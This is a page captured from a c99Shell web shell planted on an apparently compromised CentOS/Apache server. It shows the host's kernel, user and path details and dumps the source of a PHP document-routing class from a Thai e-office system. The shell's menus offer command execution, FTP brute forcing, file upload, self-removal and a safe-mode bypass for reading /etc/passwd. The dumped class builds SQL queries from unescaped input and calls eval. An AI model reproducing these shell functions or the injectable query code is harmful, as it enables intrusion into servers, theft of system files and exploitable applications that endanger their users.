!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/mistk/eoffice/class/   drwxr-xr-x
Free 52.23 GB of 127.8 GB (40.87%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     clsDocLineConfig.php (11.74 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
//--Class person--------------------------
//--PK of person ::
//    1. personId
include_once "../link/keyThai.php";
class 
DocLineConfig extends clsDB{

var 
$result;

var 
$DlcID;
var 
$deptId;
var 
$DlpID;
var 
$personId;
var 
$DlcSeq;
var 
$DlcPropose;
var 
$DlcSign;
var 
$DlcSend;
var 
$DlcByPass;
var 
$DlcView;
var 
$docGroup;
var 
$confirm;
var 
$DlcActive;
var 
$DlcIDSecond;
var 
$DlcIDMain;
var 
$DlcIDMainValue;
var 
$DlcIDSecondUse;


function 
DocLineConfig(&$c){
    
$this->c=$c->c;
    
$this->DB=$c->db;
}

function 
Save(){
    if (
$this->status==1){
        
//uncomment a line below if your table use ID as running number
        
$this->DlpId=$this->GetNextCode();
        
$this->personId = ($this->personId=='') ? '0':$this->personId ;
        
$this->DlcIDMain = ($this->DlcIDMain=='') ? '0':$this->DlcIDMain ;
        
$sql "insert into DocLineConfig values (
            '"
.th2a($this->DlcID)."',
            '"
.th2a($this->deptId)."',
            '"
.th2a($this->DlpID)."',
            '"
.th2a($this->personId)."',
            '"
.th2a($this->DlcSeq)."',
            '"
.th2a($this->DlcPropose)."',
            '"
.th2a($this->DlcSign)."',
            '"
.th2a($this->DlcSend)."',
            '"
.th2a($this->DlcByPass)."',
            '"
.th2a($this->DlcView)."',
            '"
.th2a($this->docGroup)."',
            '"
.th2a($this->confirm)."',
            '"
.th2a($this->DlcActive)."',
            '"
.th2a($this->DlcIDSecond)."',
            '"
.th2a($this->DlcIDMain)."',
            '"
.th2a($this->DlcIDSecondUse)."'                
            )"
;
    }else {
        
$sql "update DocLineConfig set 
            deptId='"
.th2a($this->deptId)."',
            DlpID='"
.th2a($this->DlpID)."',
            personId='"
.th2a($this->personId)."',
            DlcSeq='"
.th2a($this->DlcSeq)."',
            DlcPropose='"
.th2a($this->DlcPropose)."',
            DlcSign='"
.th2a($this->DlcSign)."',
            DlcSend='"
.th2a($this->DlcSend)."',
            DlcByPass='"
.th2a($this->DlcByPass)."',
            DlcView='"
.th2a($this->DlcView)."',
            docGroup='"
.th2a($this->docGroup)."',
            confirm='"
.th2a($this->confirm)."',
            DlcActive='"
.th2a($this->DlcActive)."',
            DlcIDSecond='"
.th2a($this->DlcIDSecond)."',
            DlcIDMain='"
.th2a($this->DlcIDMain)."',
            DlcIDSecondUse='"
.th2a($this->DlcIDSecondUse)."'            
            where DlcID='"
.th2a($this->DlcID)."'";
    }
    return 
$this->Dml($sql);
}

function 
Delete(){
    return 
$this->Dml("delete from DocLineConfig where DlcID='$this->DlcID'");
}

function 
GetNextCode(){
    
$this->SetQuery("select max(DlcID) as num from DocLineConfig");
    if (
$result=$this->GetResult()) {
        return 
$result['num']+1;
    }
}

function 
RSdocLineConfig(){
    
$this->SetQuery("select * from DocLineConfig order by DlcID");
}

function 
GetRecord(){
    
$numFields $this->NumField();
    
$row $this->GetResult();
    if (
$row){
        for (
$i=0$i<$numFields$i++){
            eval(
"\$this->".mysql_field_name($this->rs$i)."=\$row['".mysql_field_name($this->rs$i)."'];");
        }
        return 
true;
    }else{    
// clear value of Member;
        
for ($i=0$i<$numFields$i++){
            eval(
"\$this->".mysql_field_name($this->rs$i)."='';");
        }
        return 
false;
    }
}
function 
SearchByKey($xKey){
    if (
$this->SetQuery("select * from DocLineConfig where DlcID= '$xKey'")){     
        return 
1;
    }else {
        return 
0;
    }
}
//****************** You can add new functions below **********************//
function SearchByDeptMaxDocGroup($xKey,$yKey){
    if (
$this->SetQuery("select * from DocLineConfig where deptId = '$xKey' and docGroup='$yKey' and DlcIDSecond=''  order by DlcSeq asc")){ 
        return 
1;
    }else {
        return 
0;
    }
}
function 
SearchMaxDeptDlc(){
    
$this->SetQuery("select max(DlcID) as num from DocLineConfig");
    if (
$result=$this->GetResult()) {
        return 
$result['num'];
    }
}
function 
SearchMaxDlc(){
    
$this->SetQuery("select max(DlcID) as num from DocLineConfig");
    if (
$result=$this->GetResult()) {
        return 
$result['num'];
    }
}
function 
SearchMaxDocGroup(){
    
$this->SetQuery("select max(docGroup) as num from DocLineConfig");
    if (
$result=$this->GetResult()) {
        return 
$result['num'];
    }
}
function 
SearchMaxDeptDlcSeq($xKey){
    
$this->SetQuery("select max(DlcSeq) as num from DocLineConfig where deptId = '$xKey'");
    if (
$result=$this->GetResult()) {
        return 
$result['num'];
    }
}
function 
SearchDeptconfirm($xKey){
    
$this->SetQuery("select confirm as num from DocLineConfig where deptId = '$xKey' group by deptId");
    if (
$result=$this->GetResult()) {
        return 
$result['num'];
    }
}
function 
SearchByPsPositionDlpID($xKey,$yKey,$zKey){
//echo "select * from DocLineConfig where personId='$xKey' and confirm='Y' and DlpID='$yKey' group by deptId , DlpID<br>";
    
if ($this->SetQuery("select * from DocLineConfig where personId='$xKey' and confirm='Y' and DlpID='$yKey' and docGroup ='$zKey' and DlcIDSecond='' group by deptId , DlpID")){ 
        return 
1;
    }else {
        return 
0;
    }
}
function 
SearchByPsPositionDlpIDUnion($xKey,$yKey,$zKey){
//echo "select * from DocLineConfig where personId='$xKey' and confirm='Y' and DlpID='$yKey' group by deptId , DlpID<br>";

    
if ($this->SetQuery("(select DlcID,DlcID as DlcIDMainValue,DlpID,deptId,DlcIDSecond,DlcIDMain,DlcPropose,DlcSign,DlcSend,DlcByPass,DlcView from DocLineConfig where personId='$xKey' and confirm='Y' and DlpID='$yKey' and docGroup ='$zKey' and DlcIDSecond!='Y' group by deptId , DlpID)
                            UNION
                        (select DlcIDMain as DlcID, DlcID as DlcIDMainValue ,DlpID,deptId,DlcIDSecond,DlcIDMain,DlcPropose,DlcSign,DlcSend,DlcByPass,DlcView from DocLineConfig where personId='$xKey' and confirm='Y' and DlpID='$yKey' and docGroup ='$zKey' and DlcIDSecond='Y' and DlcIDSecondUse!='N' and DlcActive='Y' group by deptId , DlpID)"
)){ 
        return 
1;
    }else {
        return 
0;
    }
}
function 
SearchDlcIDByPsPositionDlpID($xKey,$yKey,$zKey){
//echo "select * from DocLineConfig where personId='$xKey' and confirm='Y' and DlpID='$yKey' group by deptId , DlpID<br>";
    
if ($this->SetQuery("select DlcID from DocLineConfig where personId='$xKey' and confirm='Y' and DlpID='$yKey' and docGroup ='$zKey' and DlcIDSecond='' group by deptId , DlpID")){ 
        return 
1;
    }else {
        return 
0;
    }
}
function 
SearchDlcIDByPsPositionDlpIDUnion($xKey,$yKey,$zKey){
    if (
$this->SetQuery("(select DlcID,DlcID as DlcIDMainValue,DlcIDSecond from DocLineConfig where personId='$xKey' and confirm='Y' and DlpID='$yKey' and docGroup ='$zKey' and  DlcIDSecond!='Y' group by deptId , DlpID) 
                            UNION 
                         (select DlcIDMain as DlcID,DlcID,DlcIDSecond as DlcIDMainValue from DocLineConfig where personId='$xKey' and confirm='Y' and DlpID='$yKey' and docGroup ='$zKey' and DlcIDSecond='Y' and DlcIDSecondUse!='N' and DlcActive='Y' group by deptId , DlpID)    
                        "
)){ 
        return 
1;
    }else {
        return 
0;
    }
}
function 
SearchByPsPositionDlpIDActiveY($xKey,$yKey,$zKey){
//echo "select * from DocLineConfig where personId='$xKey' and confirm='Y' and DlpID='$yKey' and docGroup ='$zKey' and DlcActive='Y' group by deptId , DlpID<br>";
    
if ($this->SetQuery("select * from DocLineConfig where personId='$xKey' and confirm='Y' and DlpID='$yKey' and docGroup ='$zKey' and DlcActive='Y' and DlcIDSecond='' group by deptId , DlpID")){ 
        return 
1;
    }else {
        return 
0;
    }
}
function 
SearchByPsPositionDlpIDActiveYUnion($xKey,$yKey,$zKey){
//echo "select * from DocLineConfig where personId='$xKey' and confirm='Y' and DlpID='$yKey' and docGroup ='$zKey' and DlcActive='Y' group by deptId , DlpID<br>";
    
if ($this->SetQuery("(select DlcID,deptId,DlcSeq,DlpID from DocLineConfig where personId='$xKey' and confirm='Y' and DlpID='$yKey' and docGroup ='$zKey' and DlcActive='Y' and DlcIDSecond='' group by deptId , DlpID)
                        UNION
                        (select DlcIDMain as DlcID,deptId,DlcSeq,DlpID from DocLineConfig where personId='$xKey' and confirm='Y' and DlpID='$yKey' and docGroup ='$zKey' and DlcIDSecond='Y' and DlcIDSecondUse!='N' and DlcActive='Y')"
)){ 
        return 
1;
    }else {
        return 
0;
    }
}
function 
SearchByNextDlcID($xKey,$yKey,$zKey){
//echo "select * from DocLineConfig where DlcSeq='$xKey' and docGroup='$yKey' and deptId='$zKey'<br>";
    
if ($this->SetQuery("select * from DocLineConfig where DlcSeq='$xKey' and docGroup='$yKey' and deptId='$zKey' and DlcIDSecond=''")){ 
        return 
1;
    }else {
        return 
0;
    }
}
function 
SearchByDocGroupDlcID($xKey,$yKey,$zKey){
//echo "select * from DocLineConfig where docGroup='$xKey' and deptId='$yKey' and DlpID='$zKey'";
    
if ($this->SetQuery("select * from DocLineConfig where docGroup='$xKey' and deptId='$yKey' and DlpID='$zKey' and DlcIDSecond=''")){ 
        return 
1;
    }else {
        return 
0;
    }
}
function 
SearchByDocGroupDlcID2($xKey,$yKey,$zKey){
//echo "select * from DocLineConfig where docGroup='$xKey' and deptId='$yKey' and DlpID='$zKey'";
    
if ($this->SetQuery("select * from DocLineConfig where docGroup='$xKey' and deptId='$yKey' and (DlpID='5' || DlpID='11' || DlpID='15' || DlpID='18' || DlpID='28' || DlpID='30' || DlpID='32'  || DlpID='34' || DlpID='36' || DlpID='38' || DlpID='46') and DlcIDSecond='' ")){ 
        return 
1;
    }else {
        return 
0;
    }
}
function 
SearchByDocGroupDlcID2confirmY($xKey,$yKey,$zKey){
//echo "select * from DocLineConfig where docGroup='$xKey' and deptId='$yKey' and DlpID='$zKey'";
    
if ($this->SetQuery("select * from DocLineConfig where docGroup='$xKey' and deptId='$yKey' and (DlpID='5' || DlpID='11' || DlpID='15' || DlpID='18' || DlpID='28' || DlpID='30' || DlpID='32'  || DlpID='34' || DlpID='36' || DlpID='38' || DlpID='46') and confirm='Y' and DlcIDSecond=''")){ 
        return 
1;
    }else {
        return 
0;
    }
}
function 
SearchDlc2($xKey,$yKey,$zKey){ 
if(
$yKey=="0"){
    
$xKey=$xKey+1;
}else{
    
$xKey=$xKey-1;
}
    
$this->SetQuery("select DlcID as num from DocLineConfig where DlcSeq='$xKey' and deptId='$zKey' and DlcIDSecond=''");
    if (
$result=$this->GetResult()) {
        return 
$result['num'];
    }
}
function 
SearchDlcID11($xKey,$yKey){
    if (
$this->SetQuery("select * from DocLineConfig where docGroup='$xKey' and deptId='$yKey' and DlpID='11' and DlcIDSecond=''")){ 
        return 
1;
    }else {
        return 
0;
    }
}
function 
SearchDlcIDDlpID($xKey,$yKey){
//echo "select * from DocLineConfig where deptId='$yKey' and DlpID='$xKey' ";
    
if ($this->SetQuery("select * from DocLineConfig where deptId='$yKey' and DlpID='$xKey' and DlcIDSecond=''")){ 
        return 
1;
    }else {
        return 
0;
    }
}
function 
SearchByKeyName($xKey,$name){
    
$this->SetQuery("select $name as name from DocLineConfig where DlcID= '$xKey' and DlcIDSecond=''");    
    if (
$result=$this->GetResult()) {
        return 
$result['name'];
    }
}
function 
SearchDlcIDByDocGroupDlcID2($xKey,$yKey,$zKey){
//echo "select * from DocLineConfig where docGroup='$xKey' and deptId='$yKey' and DlpID='$zKey'";
    
if ($this->SetQuery("select DlcID from DocLineConfig where docGroup='$xKey' and deptId='$yKey' and (DlpID='5' || DlpID='11' || DlpID='15' || DlpID='18' || DlpID='28' || DlpID='30' || DlpID='32'  || DlpID='34' || DlpID='36' || DlpID='38' || DlpID='46') and DlcIDSecond=''")){ 
        return 
1;
    }else {
        return 
0;
    }
}
function 
SearchCountByDeptMaxDocGroup($xKey,$yKey){
    
$this->SetQuery("select count(DlcID) as num from DocLineConfig where deptId = '$xKey' and docGroup='$yKey' and DlcIDSecond=''");    
    if (
$result=$this->GetResult()) {
        return 
$result['num'];
    }    
}
function 
SearchByDlcIDSign($xKey,$yKey){
    if (
$this->SetQuery("select * from DocLineConfig where deptId = '$xKey' and docGroup='$yKey' and DlcSign='Y' and DlcActive ='Y' and DlcIDSecond='' order by DlcSeq asc")){ 
        return 
1;
    }else {
        return 
0;
    }
}
function 
SearchDlcIDSecond($xKey,$yKey,$zKey){
    if (
$this->SetQuery("select * from DocLineConfig where DlcIDSecond = 'Y' and DlcIDSecondUse!='N'  and deptId = '$xKey' and docGroup='$yKey' and DlcIDMain='$zKey'")){     
        return 
1;
    }else {
        return 
0;
    }
}
function 
SearchHaveStaffCenter($xKey,$yKey){
    
//echo "select * from DocLineConfig where DlpID = '$xKey' and docGroup='$yKey' and DlcIDSecond=''";
    
$this->SetQuery("select count(DlcID) as num from DocLineConfig where DlpID = '$xKey' and docGroup='$yKey' and DlcIDSecond=''"); 
    if (
$result=$this->GetResult()) {
        return 
$result['num'];
    }    
}
//--End class person--

?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0077 ]--